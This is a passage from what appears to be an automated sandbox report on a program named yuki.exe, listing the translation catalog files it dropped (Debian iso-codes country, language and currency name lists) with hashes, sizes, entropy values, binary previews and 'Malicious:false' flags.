                                                                                                    SSDEEP:24:Ao9nySYWYvWazelqn1l0XrY+M9C0WyaVt0UzapHsXmU4BmNN9C0WzR1K:Ao9ySqCxU+V9/MUOpHtf+e9q
                                                                                                    MD5:137085522EC46ECA83861538AD580924
                                                                                                    SHA1:B9CF74662A397DB5D58F8C63578955F05E6B9A79
                                                                                                    SHA-256:B736C491E1B231C0A20032F619AA1A68CEBA36639C12BFFF9A1D0FE6C5EBBEF6
                                                                                                    SHA-512:C886E7F05B9282CF3E9942A198D11F5EFB9B362C0250DEEFBAA4E16C8B7E4757A99DA567893782E4456E7C31D1DD7F68923BF02936CB6B55CA35F85BC7B8725F
                                                                                                    Malicious:false
                                                                                                    Preview:........).......d...;...........................................................................................................................................................(.......0.......9.......A.......I.......R.......X......._.......h.......p.......z...............................................................................................................l.......v.......{.......................................................................................................................................................#.......,.......2.......9.......B.......L.......V......._.......f.......q.......y....................................................................... .......................................)...........&..............................................................."...'...(...........%...................$.......................................!...........#........................Abkhazian.Afar.Afrikaans.Amharic.Arabic.Assamese.Avestan.Aymara.Azerbaijani.Bas
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 130 messages, Project-Id-Version: iso_15924 'A R\341\272\255p'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7457
                                                                                                    Entropy (8bit):5.268582663054147
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:/3T8eaK3JaXqX64K3Sa54lcvQdbwsExQak:/weaBXB4Ra54lFdUsEqak
                                                                                                    MD5:9F6622573B3439AB0146C507836454BC
                                                                                                    SHA1:CF7DF4EE7C770DD3F339E5EF8C5CA7010B44AA0A
                                                                                                    SHA-256:D7D1AFF1032F95C70F90ECB491E792CF3E1479D337D0DEEB303172FF12FF9469
                                                                                                    SHA-512:5750BDCED820611121DC85C15D798DC1ABCB5104E7CFA7DAC7DB67872469A1E8D98F69B85C408E725291005D0FA88A7F496BAFAC3DA5F329899F8CEC623A2B8C
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<............................................................... .......,.......9.......B.......I.......Q.......Z.......`.......g.......n.......s.......|...................................................................&...!.......H.......Y.......m.......~.......................................................................................).......C.......].......p.......w.......................................................................................(.......3...#...9.......].......}............................................................................................................... .......6.......H.......g.......v...(...............-...............................#......."...&.......I.......T.......`.......f.......n.......{................................... ...................................................&.......5.......A.......I.......S.......`.......h.......o...............................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 409 messages, Project-Id-Version: iso_3166-1 'A Ph\303\272 H\303\243n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24644
                                                                                                    Entropy (8bit):5.3840423342899095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VDC08X6lN0N0cTqq+6msOP4XLAEj14kxdPHHGF:FCtoVjcjrGF
                                                                                                    MD5:41543D9E52ECCEF2A1E241568A24E5B5
                                                                                                    SHA1:950251CD153EC0254E59D84D80ACFA99A12E93C4
                                                                                                    SHA-256:CA654462700FFD33C1870CD65DD849A58961E87066B1D6E480C125119F42749B
                                                                                                    SHA-512:45384B9A122AFD7F04387444D876D62109AA6412E9989E8EC9070558C37FE30447138429E2664605468D1BAA81E8F9D8BAC5C30C1EBD8D0509AA3769730F155A
                                                                                                    Malicious:false
                                                                                                    Preview:....................#...........8"......9"......E"......M"......U"......d"......l"......s"......|".......".......".......".......".......".......".......".......".......".......".......#.......#.......#.......#......&#.......#......5#......;#......C#.. ...J#......k#......s#.. ....#.......#.......#.......#.......#.......#.......$.......$......1$......:$......G$......O$......X$......a$......h$......w$.......$.......$.......$.......$.......$.......$.......$.......$..,....%......5%......=%..%...C%......i%......v%.......%.......%.......%.......%.......%.......%..%....%..,....%.."....&..*...2&......]&......e&......n&......w&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'..'....'..$...='......b'......~'.......'.......'.......'.......'.......'.......(.......(.......(......&(......6(......R(......X(......j(......q(......y(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......)..!...%)......G)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3223 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135199
                                                                                                    Entropy (8bit):5.24413445867628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:j8/hBrzNwai5WjPUHLNJQKEx7gGcKDdsENkQvwaC2OcuHu9y7:Lai5HwcGc6TCRcuO9g
                                                                                                    MD5:3300F8670EB30525C8F6BFB85EC376F6
                                                                                                    SHA1:5C72A857E071750528F768AB52CAD6C6D2FB6D35
                                                                                                    SHA-256:E87438FE425E9195943BE14E2B27E14B2671EE18A6C75E57A9015716F283C060
                                                                                                    SHA-512:413DA20C5C0E7F80A8B0F86438A614B287E02E5A907631F18F5384697F2A2B892E1C7A24ED94612B84980CC132069841FB6B5CED73B94EDEF1440F11BA2EA8A2
                                                                                                    Malicious:false
                                                                                                    Preview:.................d..............................................................................................................................................$.......3.......<.......D.......J.......S.......Y.......c.......j.......z.......................................................................................................................................................#.......).......1.......;.......P.......\.......l.......w.......................................................................................................................&.......0.......=.......G.......V.......d.......t...............................................................................................................................................#.......*.......1.......:.......J.......b.......o.......}.......................................................................................................................................).......8.......@.......Q.......].......d.......n.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Mi\341\273\201n Nam C\341\273\261c Qu\341\273\221c Anh'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2686
                                                                                                    Entropy (8bit):5.547650646918676
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADFl/UM8vGqIfdvqNuoUhtzO6xC2xfIbNR4DFJl:qD/d8yBoUO6NwB8
                                                                                                    MD5:242C272C85D381E29DAFB7C087190FB1
                                                                                                    SHA1:5B9177CF6CEC973799550A2C4A3B9017C534D736
                                                                                                    SHA-256:F0A5AC619026A800E023087657D086BF8A2D97477E3BED5F6E7DE462E9A5EED7
                                                                                                    SHA-512:FA6A8F1CD971AD3B75E5ACD1B3600A98429B43E13B2CC3C7F877C60D7FD045C39955456D244A6C86BEC7845C1E56BFA09EDF8BA0F6E379BD0FE5CCFE97CA7E9D
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................6.../...R...3...................................................................C..."...b...................................................5...........?.......X.......x...........2.......0...............!...........2...*...@.......k........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 '\304\220\341\273\223ng Ap-ga-ni'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8278
                                                                                                    Entropy (8bit):5.169407034227225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HniqyehnDFqLqPCVOkKj9A1KahhwfxFqrbAy/i:Hn4WZqLqPGlKju1KaPwvqrbAci
                                                                                                    MD5:E3A320821C860A6554A5E41ADA65A4C6
                                                                                                    SHA1:BE58C5E6CE4BE31231191C3F3B78C0479F079E7C
                                                                                                    SHA-256:A35D0A6F7504F0645352BB68BC50863F7647965A065075A93C2ED86074E4F3A1
                                                                                                    SHA-512:E8C67D9DBD4967C6444BCBD8D4499B6ADE947C8E71CA5C3ECBF72D785D6DAA9E2119B196A0CADBC41471883D793C323CFBB7471B2589344585690725A82FD6A6
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 340 messages, Project-Id-Version: iso_639-3 'Ti\341\272\277ng Ap-kha-di-a'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16925
                                                                                                    Entropy (8bit):5.067545863849342
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3sz6Nfu3aIZCcjLWfFMrsQ86B07d1ncxyNNF:3DJua73fdlHF
                                                                                                    MD5:6FD4F1398362E00D600372A0F812B376
                                                                                                    SHA1:ECDF35689A7DBD98CBF86CDB5960FD2FBD1ADCE4
                                                                                                    SHA-256:41E6948DEF7DA1C13B592B0F59057AC441B0456E13AF42E7A2029E9BAF5BE978
                                                                                                    SHA-512:1CF7D5A73561B9EBE35ECA6DE131A77D6AB7F11F8439F56463F8878EC708330A9F6DF2403C92F661C6EC8D7F0BCDBF92DBF3406B903F1B9522291DE5712FC4D9
                                                                                                    Malicious:false
                                                                                                    Preview:........T...............\.......................................................................................................................................................................................'...............5.......A.......J.......R.......Z.......b.......i.......n.......y...............................................................................................................................................................................%.......4.......>.......F.......O.......W.......h.......o.......w.......................................................................................................................................................................+.......1.......;.......D.......H.......O.......U.......].......d.......l.......p.......w........................................................................................................................ ....... ....... ....... ....... ......& ......- ......4 ......? ......E ......O ......W ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 404 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22427
                                                                                                    Entropy (8bit):5.0371302673102045
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:EADkYG2g6yD378Q0gxr8jq5wsOP4XJOAE1i3N0J7vi8q+n9w8DjrZ:3n0t0gW+msOP4XJOAEz1Pzn9w8Dx
                                                                                                    MD5:CF63C4F8CB0F84DBC8983DC61622436A
                                                                                                    SHA1:37E2B1241F208A490AE6812B41D9FD9DCD4CF852
                                                                                                    SHA-256:0D8E9DE15EC430FA5011B49BC9FAE637FF32CFA291CDF1FD19CD4D4E4D1C2FD6
                                                                                                    SHA-512:68370AA41352A916FE788013064BEBA07A60377EF48F5D98C0487C397339225024DAB52815E179B07CF612AE0D74B374B774E5BE60A9840068BD5CEE79BE5F45
                                                                                                    Malicious:false
                                                                                                    Preview:........................\........!.......!.......!.......!.......!.......!......."......."......."......."......3"......J"......T"......g"......o"......u".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...+#......L#......c#......l#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......($......-$......3$......9$......J$......b$......k$.......$..,....$.......$.......$..%....$.......%.......%.......%......!%......&%....../%......6%......E%..%...T%..,...z%.."....%..*....%.......%.......%.......&.......&......"&......>&......F&......L&......X&......j&......r&......z&.......&.......&..'....&..$....&.......&.......'......2'......Q'......o'......t'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......'(.......(......8(......@(......K(......P(......Z(......c(......j(......x(.......(.......(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 51 messages, Project-Id-Version: iso_3166-2 'Arouba'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2646
                                                                                                    Entropy (8bit):4.800421463354829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PwP4nkpu8AfwjjDBV1p3y2fafQL/UYzuh72S0TsOxs:IPOouCjlVr35Sfs/7S+scs
                                                                                                    MD5:B1D0AD56B7CE3F19F44CC4F73A2F6484
                                                                                                    SHA1:3B76035BA8B027D1D1B0629DDB64A0CF6391425E
                                                                                                    SHA-256:FA548376E93303FC6DF08AAD7F97757EC59763E52B0349AE4C606FA7390966D6
                                                                                                    SHA-512:EDC8C212BD2C65C50DAE5CAD0F1A9F14F5B5F05A37F533FF8547BCD3009C4CCCB8B5E542212ACB1DB0D9A2F21D515BBABF9EBFC8DE9F7CF0B4D8D08FE3DC10D5
                                                                                                    Malicious:false
                                                                                                    Preview:........3...........G...L.......h.......i.......o.......x.......................................................................................................................................".......*.......1.......8.......B.......R.......W......._.......f.......l.......w.......................................................................................................#.......-.......<...$...I.......n.......}...................t...........................%.......=.......D.......K.......X......._.......i.......r............................................................................................................................................................... .......*.......6.......=.......P.......b.......r...............................................................................................-.......C.......N...............................0.......)...........1...................................................,... ...%...+...............................!.......$...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Teritweres britanikes d' Antartike'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2663
                                                                                                    Entropy (8bit):5.164856879540056
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD3OFO2vGqIfdvqNuoU8butc+rfUUivTv/jXTUS:qD+FByBo7aTr8zz7
                                                                                                    MD5:F3F3D348285B0063E8493B347C46094D
                                                                                                    SHA1:0D017A97E9338C0913E8BAB5BBE4951014376C10
                                                                                                    SHA-256:04E3B4A279808AE7332CBC8A90ECB2F0C6AC7ED59E1A1C041270CEDCE12E6F07
                                                                                                    SHA-512:E38C076262B4E909381E332087D1C54AB15BFF817BF6EDAF40BA72D0E02822B0BB719E34A9A084F4C8C81949C98B0F7BB7F4602A69442D8AE053B255FC0E7441
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........v......."... .../...C...0...s...........3...........................................0...*...H...2...s...................................................)...........5.......N.......d.......k...'...}...1...............!...............5...........R........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 322 messages, Project-Id-Version: iso_639-3 'Abxhaze'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12889
                                                                                                    Entropy (8bit):4.7167635623553865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3VcwqV/Mzl8DQaB5Y7wReXTFMsKrCFSeTJd1:OjEn7byqj
                                                                                                    MD5:01E8E97805A704F40C647EF58E4FB0CF
                                                                                                    SHA1:7A439CBA51468846070361A5AC0F4D2B9C96B674
                                                                                                    SHA-256:44C77249F359CCC7F11ABE56B6CD530F4833393F48EF10B8F553FB566E244B51
                                                                                                    SHA-512:19CFDFA1EA28643B2924EB0321B442D21445A7CEACB69C76FC2D40F9729CC43CD11E9B9C9F7448151E369CD107FC0F77CA39268B761AE0668194E96ABB002DA0
                                                                                                    Malicious:false
                                                                                                    Preview:........B.......,.......<...............................................................(.......2.......7.......@.......I.......O.......W.......^.......h.......p.......w...............................................................................................................................................................................&.......0.......7.......?.......E.......M.......U.......^.......g.......o.......x...............................................................................................................................................................!.......(...............4.......:.......C.......H.......[.......b.......j.......r...............................................................................................................................................................................!.......(...............G.......].......e.......n.......t.......z...............................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 113 messages, Project-Id-Version: iso_3166-1 '\341\212\240\341\210\215\341\211\243\341\212\222\341\213\253'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5713
                                                                                                    Entropy (8bit):5.024295531852221
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5Ls5igJ1d89pLivavO89kjFbEylUyA3cBwG7YG/wLYpoikXLyCviLz:iFJ1d8DSad0FbEKt7ZfoLz4
                                                                                                    MD5:E1429950D90C7CEB6330A1BA14C66D68
                                                                                                    SHA1:05ABCB1A86CF01AAF10BC52A6BB0A53D88E52669
                                                                                                    SHA-256:60A4D842F988E162DC92FE8C6539CE1A15B0A0C8B6A8278727CE9CD96AFA8DAE
                                                                                                    SHA-512:B7CA4E716604AB5A37B33BA397495B260FB5BB18EDBF279D79A600A72598402B1420396580C591E256A8575FA362009CCB9E347B1136EA82F2555BCA483449A7
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,.......................................................................................................................................................&.......-.......D.......M.......V......._.......x.......}...............................................................................................................................................".......0.......A.......].......d.......l.......t.......{...............................................................................................................................................................................&.......0.......7.......@.......H.......P.......V.......b.......p.......|...............................................................................................................................................!.......,.......5.......A.......U.......].......d.......y...................................................O...................'.......7.......D.......W.......g.......}.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265 \341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):476
                                                                                                    Entropy (8bit):5.389761207720562
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iXQ1xjt02UkLKcG/Ki4FLU5pXmBQWihjEl:35t0UPKKzFA5pXm6M
                                                                                                    MD5:C45ABE6CB060F4D614A88181301FF0BF
                                                                                                    SHA1:C94A85281390110ABE24A3A1BA3087DE37F8E920
                                                                                                    SHA-256:FEC980EAE71DCDD605E092A8A18320D1CF0A04300813C5682D5FA23B70CB434E
                                                                                                    SHA-512:1624B419308908C78B28EFB057C85418CA8698D31672E161C62D5A612F6750E40B79FF791C24271E9B88A0181214B823FF38515C3F9152CEA418EEB5DF033B31
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...O...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Walamo.Language: wal.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 392 messages, Project-Id-Version: wo 'Afganistaan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21638
                                                                                                    Entropy (8bit):4.994392805925852
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:8k2acl9NGYhEqvbYiUxTbj05wsOP4XGCAjtuV08mJFjVgZAZP+8p:8RagvGmvsiifQmsOP4XGCAjfFjVgZA5p
                                                                                                    MD5:E9021E8681A57283F56F9493D777C294
                                                                                                    SHA1:05339FF4B63BD3C19DA0B113DAEE3220B71035B7
                                                                                                    SHA-256:C420274451FE52E6541EA997DE4D1B3820BB12B027B26B891775257CC50BE989
                                                                                                    SHA-512:9DC410FBC27208DC975F8AFAA956A15473083911BDBD92F7D1A2C59878CF8D2095C367CF3FC8C50D5FD70826E54FEDA7C35919678BD420B3DE8E1C31A216D48E
                                                                                                    Malicious:false
                                                                                                    Preview:................\................ ....... ....... ....... ....... ....... ....... .......!.......!.......!......+!......B!......L!......_!......g!......m!......w!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.. ....!.......!......."......."......#"......1"......8"......W"......n".......".......".......".......".......".......".......".......".......".......".......".......".......#.......#......"#......;#..,...W#.......#.......#..%....#.......#.......#.......#.......#.......#.......#.......#..%....$..,...($.."...U$..*...x$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%...... %......(%......1%......M%..'...[%.......%.......%.......%.......%.......%.......%.......&.......&.......&......+&......;&......W&......]&......o&......v&......~&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'.......'..!...*'......L'......^'......|'.......'..0....'.......'......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: wo 'British Antarctic Territory'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2544
                                                                                                    Entropy (8bit):5.128329251974936
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADOatkb9qOvGqIfdvqNu8UVcVwQIgNNrrKUZZ:qDr+BbyB8KYNz/NP
                                                                                                    MD5:A739869FDB650E363DDA69C5D4D359EB
                                                                                                    SHA1:AE2FC086939C2E851BB5CEA4C7F723F24F9D0909
                                                                                                    SHA-256:8E697265098988BD7E714F8B0A89C0FFCFA4ACCE577E468E032A1BFC40FD5FB5
                                                                                                    SHA-512:9C331F2021BE5A4A5E47B9C56E574ECEEEF1DB31ED45BB6872D055C917481F8B434D622EB567AE5B08EBA8BB1FA9DD73E210C1A64AD59823887470CF9887805D
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........n...............(...4...+...]...........-...............................................)....... ...4.......U.......p...................................!....................................... .......,...@.......m...#...............(....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_3166-1 'Antigua no Barbuda'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2821
                                                                                                    Entropy (8bit):4.623872045152753
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9wQ90guVYCh+B/Gfr9O+kXkKF5BZNN/plO7KyU2TezOc4NVcwqMOSgq:9wk01+/Or9OPFt6uyTaypcwq/W
                                                                                                    MD5:00883FC676407FD1F58DA33B2BBF7A2E
                                                                                                    SHA1:68032E4B8957C154C6F960D56B9E05DD829F290C
                                                                                                    SHA-256:ACDE178FB8BD8BE067F239262CCCD8ED3CDEE5972E317B3AB28356C08E9EF93B
                                                                                                    SHA-512:F37BE04C577C63C172622692CCB774C259A1A6C4F5D999CB46D1D403A0BD183D8BFE9F038566ED3306DB7523E83375C6AB479871657B7AA516281CFF20F8EEDE
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......M.......W.......a.......i.......t............................................................................................................................................................... .......*.......3.......;.......C.......M.......U.......\.......b.......h.......o.......y...............................................................................................................................................................%.......9.......A.......I...l...S.......................................................................................'...............7.......>.......D.......M.......U..."...]...............................................................................................................................................................#.......).......0.......<.......Z.......a.......h.......q.......v.......}.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):422
                                                                                                    Entropy (8bit):5.172809123419564
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcl6YYxA9Ct0vOuvP0NXzffs5k/RyAbwl8Aj8uK72AF6uK7BNnvXmBQ8KMW0W:i4cExxjt02UkB/NklRhef2vXmBQWi9
                                                                                                    MD5:23DC3D324E39DE2B7BB5C42574CFBB4A
                                                                                                    SHA1:5B5802858729684D0202203040C83DA5EC15C588
                                                                                                    SHA-256:250DC6F8972FBF60E558F9D5287A955D068109B166D41F3E404031BD648E6B27
                                                                                                    SHA-512:84CA6D809D18F96FB6EC0471717559DEB416523767E7CCF8CFEB01E2CE78DF1F8DDDB3CFE073B67F3A00B02333404CF1527748DC0B2C1B7D823ECEAFC53C1272
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...l...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-01-05 18:40+0000.Last-Translator: Antoinette Dekeni <antoinette@translate.org.za>.Language-Team: Xhosa <xhosa@translate.org.za>.Language: xh.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 53 messages, Project-Id-Version: iso_639-3 'isiBhulu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2528
                                                                                                    Entropy (8bit):4.6010753065567265
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:mbNSFjSKKE4MXpsXhziMUrTeU9seReoEYvz+Z:mbsSRjWmhiMoaMseReoE+u
                                                                                                    MD5:64329D4CC0DA05CC5CCA4833B8CD1BF8
                                                                                                    SHA1:029BD8C7B8D788964636EA5E77F61D6B8C3DACDF
                                                                                                    SHA-256:6FB7F581E5BFE682179D370975DE44CD41EE699FA80B5C746AA07A338CDCFB4E
                                                                                                    SHA-512:2B01C7B66278E1A740D9E69800C73290B5611F21C7CC7C5ED8CC49B9013CEF53C123B4FDF3DDBCD3E0460D54DCFE621B0CB4691CAA7AA6CB79B0ECFD020881AB
                                                                                                    Malicious:false
                                                                                                    Preview:........5...........G...l.......................................................................................................................................................................$...............9.......?.......G.......P.......W......._.......g.......r.......}...............................................................................................................................................................................#.......(...............................................................................................(.......2.......@.......M.......X.......d.......n.......y.......................................................................................................................#.......+.......6.......A.......K.......X.......b.......k.......v.......................................................................................1...(...*...........2.................../...3...&...........%...............!..."...........'...............5...........
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 219 messages, Project-Id-Version: iso_3166-1 'Afghan\303\255st\303\240n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11032
                                                                                                    Entropy (8bit):5.149347423449318
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:eAd+Bstlk7ahn2zt3bBwTJBzugoJu0ZNmd2NvrYTASRt:lkstlIahna5bBw19ugoJu0ZAEYcy
                                                                                                    MD5:29DE8CAE7A81906FB2AE54A0314E79E0
                                                                                                    SHA1:AFDA9CC4156B3774485618BC2D483CD6A811FF3E
                                                                                                    SHA-256:BD725402E2DA0965EFC5B98B7DDCED349996EC011F082A1393A06302E22219DA
                                                                                                    SHA-512:4B5DDCDE67B62223663D67E9DD37A558DAA1A1DEB4230CD8C17F3067062AA00E9FDA150CC18A14109440A9F4D196B2989412FAA43E89032E93DC79B197F9E420
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........`.......a.......m.......u.......}....................................................................................................................................... .......&...............5.......=.......T.......].......k.......r.......................................................................................................*.......3.......;.......H.......S.......[.......`.......i.......p.......................................................................................................................#.......*.......8.......I.......O.......W......._.......e.......o.......v...........................................................................!...........................................................".......'......./.......;.......B.......H.......P.......V.......].......d.......o.......u.......~...............................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 126 messages, Project-Id-Version: iso_15924 '\351\230\277\345\276\267\346\213\211\345\247\206\350\257\255'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7170
                                                                                                    Entropy (8bit):5.685621651090454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:jQLIqjAZIdKIlvM90bYLtDmnONfYUDy47us7eKRRo+lMWi6/k4E1AcmIBOtjm4Fv:kL4Ghlva0Q+4KqFS2jE1ARIBOtjm4d
                                                                                                    MD5:C1A5E64BBFC3AB0A820F28F9CFEBD170
                                                                                                    SHA1:BF7A3BEB279760059A509C7E89D34DD3EB16CED7
                                                                                                    SHA-256:EF779D08B54EC22BE7256C5B45CAAB4F4075B2E0B0A580E6250C3EE444AE6496
                                                                                                    SHA-512:55F99C2F12E5AA0E855AD0D3F08BF45B6100FC8BDAE0F9E928A3AAC4BAFC0F8F8BD43DC95619094ABBA5CD08EE494BD447AED28C84C89E1F074B5926867C1996
                                                                                                    Malicious:false
                                                                                                    Preview:........~...................................................?...........................-.......6.......>.......G.......M.......W.......].......e.......o.......{...............................................................................................................).......0.......8...&...A.......h.......y...(...................................................................(......./.......7.......=.......F.......O.......i...........,.................................................................../...4...^...................................................................#...................................$.......*.......3.......<.......J.......Q.......X.......b.......t...........................................(...............-...........H.......O.......U..."...u........................................................................... ...........7.......B.......H.......R.......Y.......a.......k.......x.......................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\351\230\277\345\257\214\346\261\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23425
                                                                                                    Entropy (8bit):5.661922317837652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosV5Ny46nbjz5wsWP48WAINiZGr5GLokLM+:0oiy48fmsWP48WAIVsXt
                                                                                                    MD5:1A8279EF47AEAFCEAA1E6FC05DC3E04E
                                                                                                    SHA1:9DB5829E8E3ACDD1DA81D7A24D4E3495886932B4
                                                                                                    SHA-256:705BE6DAD84BF15AD438183FC2045208DA44F249795B9D2815653FDA8B8BF1A5
